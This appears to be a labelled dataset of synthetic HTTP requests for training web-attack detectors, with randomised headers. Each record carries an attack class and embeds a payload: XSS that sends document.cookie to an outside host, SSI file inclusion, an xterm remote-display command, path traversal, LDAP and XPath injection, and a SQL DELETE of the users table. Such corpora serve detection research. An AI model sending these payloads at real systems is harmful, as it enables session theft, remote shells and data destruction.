Cookie: oS8HfYyG9sock_streamt=sctmpwoorai@ xseslf7;grTyN=rhstsrAtmptnhpslaupdate0a;ertcieestoetea=ufromsstixhse;Tns8xf3aq0o94o=807
Cookie2: $Version="05"
Date: Fri, 16 Apr 10 07:56:49 UTC
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 14 Mar 10 06:15:11 UTC
If-Unmodified-Since: Sun, 02 Sep 07 08:45:12 CET
If-Match: "dQEuefFbIxp4tn.NinJ"
If-None-Match: "A5d0@9cR@oiQehAe"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: http://iNnWd.com/roanusor/ie9a/natc/s94SiteZ.swf
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: oncf (yKY_u6SKPL; eBX6WXvDZ9; nTRgW3Ti)
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4653x522
Via: HTTP/3.6 49.91.146.155:963, 6.0 www.ehests.gif:6340, eaivOL/4.1 www.htsmuy.js
Transfer-Encoding: deflate
Upgrade: Nxie/2.9, waree/1.4, eaTli/1.5
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49734
Start - Id: 47458
class: XSS
GET /nsuo0eenprbtel9zszid/et5f/onTam/ldFwM/nbr94twiIbehttemsh/kieftuHr1oetfeEb4.png?aooe=eeT&9aatASgiu=fob3aavt6tE51deoq&edown8ae=2dne%7C4%7Cnullnodedbgsoundemochao++uc&srz=8fy&nnrtSeoxai=nninmochal9%25tpi&atmiexUr9ngi=sIt2&3tiOtrlal3bg=30827&le=6945382&7emdh=0913&aiennnlags=5sd+++%3Ada8&einaenapxn7n=%3Cstyle+++++type+++%3D++++%22+++++text%2Fjavascript+++%22+++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.lagere.com%2Fcgi-bin%2Fti.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+++%3E&inputDRN7pPinw.=mailstyletC&aeeNdncr=+qa%25&saKht=x&rSais=9334065 HTTP/1.0
Host: 40.147.212.206:9
Connection: keep-alive
Accept: text/xml, application/*, image/jpeg;q=0.9
Accept-Charset: x-mac-korean;q=0.5, iso-10646-ucs-2, koi8;q=0.4, iso-10646-ucs-2, windows-1255;q=0.3
Accept-Encoding: 
Accept-Language: Snu-exsibtqs;q=0.9, ydktno-tdhroi, ya-ctecitpo
Cache-Control: max-stale
Client-ip: 146.143.28.253
Cookie: afHJGc=nasr8acp;jgsmhpinc=stegd;nrhn=yyz4RUVNzYE;ieome=de dwu1(in ;Stt6hh=816
Cookie2: $Version="073"
Date: Mon, 19 Nov 07 08:13:04 CET
ETag: W/"UCqG8sTrPrBsCcr7vUF"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Sat, 27 Mar 04 19:39:19 UTC
If-Match: "QihT2@JJj9rNApZHG"
If-None-Match: *
If-Range: "@IDbvhBxz5wZb4@itS"
Max-Forwards: 1066
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM dWgxb2NlYU9uc2FhdG1hZW90d2VpcGp0SWE5aXNydEtONW9yTGRl
Range: 9547-817639
Referer: /t8iorlt/eeoyr.pdf
TE: chunked;q=0.1,trailers
Trailer: From
User-Agent: Mozilla/3.0 (Windows; U; Windows NT 8.0; nd-sn; rv:8.5.1) Gecko/99453972
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4532x5831
Via: kaezOt/6.6 www.cBjh.jpeg
Transfer-Encoding: gzip
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47458
Start - Id: 39594
class: SSI
GET /sNUPVtXyvp/.PJC_8/cegr3maymaraq/qj_.zNKBsL_d8KmDR6.jpeg?fbnaFdftsutme=r+d%5D6%3Fro+stxaj&Nd=%3C%21--+++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&4itArT=62583&OrfcgisetoChn=igAweoheb+&8qlsoSdR5HW@=iho3&4acceptK_MX7U=63310814&h4eh7dgpatD=lxghe%3Bsogor&BaunieJoa4Htg=7Adiye&imn1Diy5=f4sS HTTP/1.0
Host: www.wDolFd.be
Connection: keep-alive
Accept: video/quicktime;q=0.2, application/*, video/quicktime;q=0.1
Accept-Charset: iso-2022-jp, ks_c_5601-1987;q=0.2, windows-1251, cp-950;q=0.2, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.19.170.214
Cookie: dovdoiht8Ee=fSriAntb3rdee;oes6ur=ople61;tiSe=)as;evMpnepkrP=413eetenithrbast;ainri7ti8op7e=mwhere
Cookie2: $Version="7"
Date: Thu, 18 Nov 04 21:14:21 CET
ETag: "QPI4Dj3kL@568.RaYHgi"
Expect: etree
From: k4wcg@aEdi7a2.de
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Tue, 21 Apr 09 11:36:36 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Apr 05 20:03:53 CET
Max-Forwards: 14
MIME-Version: 2.2
Pragma: eeh='eInew'
Proxy-Authorization: NTLM c3B4Yml0cGFpaWk0YmVscWVpU2h0ZWRybGE3ZWluc3NlamlqbjZkb2Nq
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: http://R0nn.de/rykai/ccortdnu/daedshw.sh
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: jafnnlldzede
UA-Disp: 7073,179,8
UA-OS: Win9x
Via: 5.4 www.sery2na.shtml, tnrak/6.5 135.93.162.126, FTP/6.5 www.Oqc5x8uc.gif
Transfer-Encoding: MetdED; a2onthu=n4mae75q
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 693 www.esm2no.shtml:36 "eEi40rmtp" "Sun, 28 Feb 10 20:28:26 CET"
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39594
Start - Id: 43302
class: OsCommanding
GET /oFfiDsam/upvMuiZHa7./tPtQ9j-3kgkR@wpoC/rv346eTLP8YACSf/itp/8hnYyPVQ/dpya8rubbsctoin/spnbl2ohy/B@6RTGAdvbscript.htm?NoEesh58aso7=7anyg&2iixosovEhnd=509&csaettbdfdte=uanmvson&S2dioerc=%250Axterm+++++-display+www.laarlellllel.com%3A0.0+++ HTTP/1.1
Host: 136.148.155.39
Connection: close
Accept: */*;q=0.1
Accept-Charset: macintosh, windows-1252;q=0.1, cp-932, windows-1255
Accept-Encoding: 
Accept-Language: sFsia72a-eofe, aoDyad-plfwaTx;q=0.8, i-qtw;q=0.1
Cache-Control: min-fresh=4066
Client-ip: 102.61.9.190
Cookie: fdUei=0Tk0AmFe;.mZASPE5=ld5ztctacbaped
Cookie2: $Version="7"
Date: Sun, 28 Oct 07 03:19:10 GMT
ETag: W/"pGAcH-IoVLLI.qP.7"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Fri, 21 Dec 07 05:06:04 GMT
If-Unmodified-Since: Thu, 18 Feb 10 04:58:46 UTC
If-Match: "bo.nYMc.KHOEAqWVu"
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic cDlzYVNpc3Q6cEZOZnIx
Authorization: Digest response="e94e9e549009C6cefDEbd6920AD5aE3A"
Range: -340027,1338-0
Referer: http://www.na6Stmt.net/n10g/90doc/looeuwhj/nuemaadt.dll
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/9.3 (X11; U; Linux i386 7.1; gm-tw; rv:0.3.6) Gecko/31439918
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/0.5 112.49.75.59:128
Transfer-Encoding: deflate
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43302
Start - Id: 45008
class: PathTransversal
GET /ewbnsehfodw5smNidah/vsSMhjek9dkO1_763bS1/jq_styleqnodeV/oSDea9DsrOQ/-KW/60/nIY7NSkDo3e4..php4?majEsawuseudtdi=6525&chome1C=nw5cUF4Mfe&aUenwio=..%2F..%2F..%2Ftric%2Fadmin.txt HTTP/1.0
Host: www.xeEIsmyr.ch:2845
Connection: nss56
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 112.213.27.172
Cookie: 6b6S48GO=bGQ
Cookie2: $Version="75"
Date: Tue, 22 Nov 05 19:35:24 GMT
ETag: "06Aqq7j6Gd0C_dK"
Expect: mrtcnid
From: Wmt1aod@ntoq7.ch
If-Modified-Since: Mon, 31 Aug 09 24:54:47 UTC
If-Unmodified-Since: Thu, 07 Oct 04 22:01:44 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 31 Dec 05 19:04:40 GMT
Max-Forwards: 826
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: NTLM aXNyYWVzaHlnbnRlaWF0UTlnbGN0bXBjaWFxdHR0aTNhdDJ2cmVhc3M=
Range: 2613-116,8-,0-
Referer: /twhL/s8g0/7uanobw.asp
TE: chunked;q=0.4,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.8 (compatible; levat; Win98; Idlaw; y6eproe7; p5titetsl)
UA-CPU: StrongARM
UA-Disp: 702,0024,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 569x3212
Via: 7.4 63.63.16.209, 8.8 183.140.106.250, 5.7 www.enh4.htm:0152
Transfer-Encoding: compress
Upgrade: Eubq/3.7
Warning: 841 177.253.103.43 "siish1237R9c5ebtn" "Mon, 07 Dec 09 02:26:19 UTC"
X-Forwarded-For: 2.2.77.25
X-Serial-Number: 416965693629057217
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45008
Start - Id: 39116
class: LdapInjection
POST /fnTZe5Lma-okhJ/B9Tnph-DofmochaLgnetcatq/tsoehaLiwn63b/T-o046LTNQaH/ms6eiselm/noa0.gif? HTTP/1.1
Content-Length: 96
Content-Language: itEia,apeg9ia,ar
Content-Encoding: compress
Content-Location: http://www.nhftspo.com/mzetm.msf
Content-MD5: NnNydHNleHJPdmhyOG5lbw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 20 Aug 07 23:30:35 UTC
Host: 92.26.95.217
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: x-mac-arabic, iso-8859-15;q=0.0, x-mac-arabic, cp-936
Accept-Encoding: gzip, compress, compress
Accept-Language: *;q=0.9
Cache-Control: no-transform
Cookie: shnettneMym=ankii)(  |(egnu=*)
Date: Sat, 23 Jun 07 17:15:01 CET
ETag: W/"gZFl0@Nu2rWw.db"
If-Modified-Since: Sun, 24 Sep 06 15:55:09 UTC
If-Match: *
Max-Forwards: 10
Pragma: no-cache
Authorization: Basic MWhvZ291cmg6bWlhbA==
Referer: http://fhr6iIt.de/4eutii0e/c8ngpnoy/idyur/uhIqEla8.tar.gz
TE: trailers,deflate
User-Agent: Mozilla/8.7 (X11; U; Open BSD i586 7.1; eb-ot; rv:1.7.2) Gecko/11787438
UA-Disp: 917,4219,32
UA-Color: color16
Via: HTTP/9.3 www.hye6ma.htm, 3.5 www.m5nmhzo.gif
Transfer-Encoding: deflate
Warning: 676 148.148.45.189 "3fhroMseset" "Wed, 28 Apr 04 09:47:59 GMT"
X-Serial-Number: 70645330174185
----: --------------------------

othot=02136&8GvO.h=eaea9ohceoOeu7sch&llNdrtyaaes=8&tgDsaia=~es+&lle=nFwUBTL-cJbD&oT1Q=x engt

End - Id: 39116
Start - Id: 37235
class: LdapInjection
GET /kCOrbfCgXQVs/3hyevdmdlIsgTesp/A0tQYxNVZq7NiRZ/hJMNjmyTj/9Zy6XO03.js?clhjtD=TDxey&CoeNnolcHj=6%3Eausruautoexec49%3Aldsad&GIIoH=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&oohfkr=n%29ac%3D HTTP/1.0
Host: www.eu8jre.it
Connection: close
Accept: image/*
Accept-Charset: koi8-r;q=0.1, ks_c_5601-1987;q=0.9, x-mac-hebrew
Accept-Encoding: 
Accept-Language: aefjin-0li059, raezl-ee, aaenlyhe-lntuAP;q=0.4
Cache-Control: no-transform
Client-ip: 164.10.58.80
Cookie: frecxIml=$g 6;nyo=uls1n;ehoa ai ;fO=saTto>~\;tqgt8nAsdgrn=87;NWd=ehj/&;8IQw=umasT2tcr )h
Cookie2: $Version="79"
Date: Sat, 12 Sep 09 12:02:34 CET
ETag: "9s4VjvQcPLA.jPaknH8o"
Expect: xg5edee=apam;5hda
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Jul 04 21:53:41 CET
Max-Forwards: 685
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: tt0ae kfho0=til1E8
Range: -035
Referer: http://www.x9w5rma.st/Lhrdbin/stsn/yefab/ZtxadoW.msf
TE: trailers,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/6.3 (Machintosh; U; PPC 0.8; bo-sn; rv:8.2.8) Gecko/88330300
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: compress
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37235
Start - Id: 36934
class: LdapInjection
PUT /fps/e1ycg@@0-Our@/zu6i2h7hIeoefl.html? HTTP/1.0
Content-Length: 279
Content-Language: sorliue3,a,dHie7lb
Content-Encoding: deflate
Content-Location: /rneentva/tteaeu/gabnn/edirt.gz
Content-MD5: d3NjRGlvc2Z4THRibWRlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Apr 05 04:41:19 UTC
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: www.7d3et17n.de
Connection: keep-alive
Accept: image/*
Accept-Charset: windows-1254, macintosh, iso-8859-9;q=0.6, euc-cn;q=0.6, x-mac-japanese
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 162.232.160.26
Cookie: Ht=ltDhinput%iechoEecuelae kr;qen7caoteto=dsyigceew;;beilqsal0ui=42684;lmlXS0al=b;PYM63betweenN3dP=2717525
Cookie2: $Version="1"
Date: Wed, 05 May 10 10:00:52 UTC
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 30 Jan 07 24:04:59 UTC
If-Unmodified-Since: Wed, 28 Jan 04 18:59:20 UTC
If-Match: "TVPMmnnsf_w1O0OX9Q"
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: NTLM ZWJubzFidEVldXJ5Zmk0ZWVvZGFpdHJkaWluZExVZG50RW5ldVRtcmFmeQ==
Range: 21-,49196-
Referer: /sdenaaqa.gif
TE: deflate;q=0.5,gzip;q=0.1
Trailer: Accept
User-Agent: etru/3.0.4.6
UA-CPU: PowerPC
UA-Disp: 6303,0091,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~

re4rotaye=e7of-e-oe3&TneTnionsbtid=oum&a8Aej7f=ntb i%u&connect0hJI@=ltr&gltepodie=757&8i6afeey=na)(&(objectClass =we*)&lri3vaa=cmdT9&le80nmpstshgo=it5tteaaenooeUiib&aseOaajgeMuds=tykWiP7tYw&nNhsfr7sl=wrw9i\t2siHnee&itun6glMa=oryai&x1toecrfcde8E=q3elbk_m&xi6=l8rZ_

End - Id: 36934
Start - Id: 41379
class: SqlInjection
PUT /y7/pdGegfRO6ro26etgeo/nH99tBIdcfzGY7jhx/eY.zSawR.asmx? HTTP/1.1
Content-Length: 210
Content-Language: N,uomcdo,hnmamooh
Content-Encoding: identity
Content-Location: /rumio/r9lul/2zSe/nemEo.msf
Content-MD5: cmg2aU9yT3RkdG50NGRxVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Wed, 15 Mar 06 15:57:50 GMT
Host: 51.245.190.144
Connection: keep-alive
Accept: video/*, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: drelsp-ueI7s, fdtsrgsa-yne;q=0.5, e2r-oeooua;q=0.3, wBeetq-iaolt, auttz-bs7N
Cache-Control: waT4b='zl'
Client-ip: 182.0.7.148
Cookie: C@PhEwIPA=804;eeaaaum=sUpiFerhce2ntqJhRw;ami6=tlzioAlayoynrcpske
Cookie2: $Version="30"
Date: Wed, 07 Apr 04 13:17:01 GMT
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Sat, 08 Jan 05 01:10:38 CET
If-Match: "I7Wz--cPV01sT3@B"
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: -49879
Referer: http://www.heenctll.biz/3siscr/ondgoeEt.php
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: boMStac7M http://www.dthwei.be
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: yoeaer/5.5 www.mroslAsl.css, 1.7 www.oDo4s.gif, 7.4 www.otstiqx.css
Transfer-Encoding: deflate
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

3l=e4M6tXJUDBgW&hono=%ngpaesunnc&ttthe8tjhemgo=xmlcCm;7&ilEprisSlch==owld&Ssiomv5=Mtenstv' ); DELETE FROM    users WHERE upper(username)  =     upper(  'admin&7EB1=376204&atd5etalasFsa= Rt

End - Id: 41379
Start - Id: 37790
class: LdapInjection
GET /stlccIPVkXZ8qsRAY/9rJ1/6vbscriptstylepxwzlQ-8f/q0WUm1zcZNK5oDSLq2/oGJ1JN..B8ZiS0tmtUv/mmy.js?CbN1imgI2=e+&ghmf0coy=e3nuA.x&tfbk=noia%29%28%26%28objectClass+++%3D+sae*%29&St=iais&n8=ofme&rowuo2deera=+honin&tId4heisaonniis=orowheenai&aTFaisd=oognpueDep&8tonuiqet=7loemu&ihAspnsdoehasLc=337442&CsIUWzIOHy=hecmdr8+ohu9&xtnnk6nctmSmhyi=jt&and2AC0m=ueincatnssaaopene&e2ostacoS=404732013 HTTP/1.0
Host: 16.10.215.84:80
Connection: Hvteie2
Accept: */*;q=0.9
Accept-Charset: windows-1258;q=0.3, big5;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 3.185.76.253
Cookie: jekqf-cIt2VQ=a$s;tRl=ny7Nd
Cookie2: $Version="129"
Date: Sat, 17 Jul 04 15:42:16 GMT
ETag: W/"hT5JfGxU2GgtrH_ku4"
Expect: Re15=eal3air
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Fri, 17 Jun 05 10:18:07 UTC
If-Unmodified-Since: Sat, 03 Feb 07 18:05:31 UTC
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: "xP.2rvy@Kyq-1nFiQacF"
If-Range: *
Max-Forwards: 967
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 5rOgw olket=bU2elthe
Authorization: Basic TXZhbjpIZVlpYWVs
Range: 985797-045,63371-
Referer: /teety0s/obt3/saTr86d/Ef7o.cgi
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.2 (X11; U; Open BSD i386 2.8; Ne-8v; rv:1.4.7) Gecko/05278339
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 807x162
Via: 9.5 12.189.233.108:313
Transfer-Encoding: identity
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37790
Start - Id: 48299
class: XPathInjection
GET /bJgHecxq.css?isTlNozeihytei=uauyehOe&atfdrsxo2eO=Gxam&vhishoge8Toor=7089&8ahwhaan=i0XT&eo=+e3js&bsleisldoge0=nl&Un1esgEqeamoa=blbafjaaI1&syohtvnWtc2hDr=83818 HTTP/1.0
Host: 232.103.233.194:91421
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: 8789   or  1<   cta/uuT5Qe/ea2y/child::text()[position()=793] or 355='] | /* | /foo[bar='
Cache-Control: no-transform
Client-ip: 111.168.194.196
Cookie: u8Ldfan=5ewiq;hEmsdtn6=eoMTT1;0twwsnduep=42690;r5oblheoasf=v7b
Cookie2: $Version="81"
Date: Sat, 10 Jul 04 22:19:45 GMT
ETag: "ZLy59ecHT.SGeqbS-l"
Expect: snoiTjo1=irrdax
From: mSrf3p@empeero.de
If-Modified-Since: Wed, 22 Nov 06 23:50:38 UTC
If-Unmodified-Since: Sat, 17 Sep 05 12:49:21 UTC
If-Match: "RGZiilWlYbdxMTXCeViZ"
If-None-Match: *
If-Range: "W77b6dbr_3E2qGw8KDF"
Max-Forwards: 049
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic bnJlZWI0aXU6b3RldHJlbHI=
Referer: /o3Rmxcm/bwhimh/denomss/ujgnSjgs/nnblMra.php4
TE: deflate;q=0.1,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 3.0; a0-hj; rv:9.1.1) Gecko/20078393
UA-Disp: 161,1188,16
UA-Pixels: 7350x333
Via: 3.3 96.89.107.227
Transfer-Encoding: nisig
Upgrade: e0ePs/3.7, eids5/6.0, aacr/1.5, dsm/2.6, Stu/3.2
Warning: 917 209.120.191.237 "rpaWttoyTfGs" "Mon, 30 May 05 05:56:19 GMT"
X-Forwarded-For: 145.155.0.124
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48299
Start - Id: 38501
class: LdapInjection
GET /oChtifuas0ie2h/toq1erIap/hcaoctddiisqr/c0zddauo/3Dye/aT_/oc8toE2mycnp0/er.nlGr4eM/dWx3c4G/WZ95libSelS6Vbgsound.a/Vinz.js?x2mc=are&rlzgilnetar=htpasskm6s&5i=eut&voA9sWtnz=ariqy&e17OfbdkSu7ei=7499%29%28%26%28objectClass%3DFtl%29%28%7C%28sn++%3D++Ds%29%28cn%3Dalb+++J*%29%29&eelugbbhn3j=1&aa=8oaaymdde&Bn9rmh=11893966&onsxntblool=tADO&8WnuoiWbps8dAO=iroZ0drEuymypr0&ylRhluhdn=c0hY&8arsoi=vsEae3&9ujpfo1mna=euprE8pt HTTP/1.0
Host: 192.90.116.129
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 8n3e-e8ivde8;q=0.5, e-di, tkue-tn, oad-oca, 6ew-t;q=0.1
Cache-Control: no-transform
Client-ip: 219.137.118.75
Cookie: yg8tT6h=65;_8RnH=eftas<cSopensehrsetc;3toh=rgEyx2;weerccTgsan568t=tstaee0ettt8iit;snH7h=@g|madmiouit8 shutdownr2;-q9B3=8P3y=a\vpositionagroup byohAr]all@5
Cookie2: $Version="61"
Date: Sun, 05 Aug 07 15:46:23 UTC
ETag: "@oxpL@CZ7HOtjkNK"
Expect: 100-continue
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 10 Aug 08 15:51:51 CET
If-Unmodified-Since: Tue, 31 Jul 07 16:58:38 CET
If-Match: "gC4q19b34aLJCr@tB3"
If-None-Match: *
If-Range: Fri, 13 Aug 04 02:50:40 UTC
Max-Forwards: 3
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Digest username="fphe"
Range: -0833,-044
Referer: http://www.a1motl.com/dduiocg.msf
TE: deflate;q=0.8,chunked
Trailer: If-None-Match
User-Agent: iodGhwrs/1.9.8.5
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9397x4761
Via: FTP/9.2 108.29.96.144, 2.0 236.186.152.133
Transfer-Encoding: identity
Upgrade: hiE/0.7, ube/1.1
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38501
Start - Id: 38029
class: LdapInjection
GET /hutohzr62bee/uI_TIbjAHU6iPRWG/vK1HWS1FVQ/i.DQPB/gUtJUdsKW3O.-j39lnr/wYi@m.q/l1PpUe/1mqUI.iA7e.UWoriXg0.aspx?soro7nemsohmea=osrwgi&2ipolaveu=ped%29+bsd0ae9+4af&b9lmMe=5016546956&siLs31=219987&eia=tas%29%28+++%7C+%285oa%3D*%29&legevii=irnglkTlol3dm&rew9ueebu4=adivcxnnrts&uGZRCI8=21763443&9bo=895470&lnmthAadele3=2 HTTP/1.1
Host: www.e6cht.gov
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=8
Client-ip: 252.123.213.7
Cookie: oud8eg5a=@isbd
Cookie2: $Version="7"
Date: Sat, 17 Jan 04 18:39:57 CET
ETag: W/"hJ9vUmp.@v3Mr.ewG7Hg"
Expect: 100-continue
From: aFbh@rtrss.de
If-Modified-Since: Wed, 17 Sep 08 17:37:29 GMT
If-Unmodified-Since: Fri, 20 Jan 06 22:31:58 CET
If-Match: "9bsaevpT_SqBf9ED"
If-None-Match: *
If-Range: Thu, 18 Feb 10 03:25:18 GMT
Max-Forwards: 857
MIME-Version: 8.2
Pragma: aisnr6ea='lti7t'
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: Digest username="77ke"
Range: 67-6,809162-
Referer: /eeecCRaa/8kger/hossg9Ua/hwdl.cfm
TE: chunked;q=0.5,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: dtshrterr (lEdBotiP; a200VOJ; eU@lxH)
UA-CPU: x86
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 427x816
Via: 4.0 www.sh3seq.gif, 3.0 www.ageeaWiO.html, FTP/4.6 52.36.212.119
Transfer-Encoding: deflate
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 508 192.205.119.35 "nt4dwdbahmiorotHpmts" "Tue, 19 Apr 05 13:54:10 CET"
X-Forwarded-For: 59.200.146.205
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38029
Start - Id: 46242
class: PathTransversal
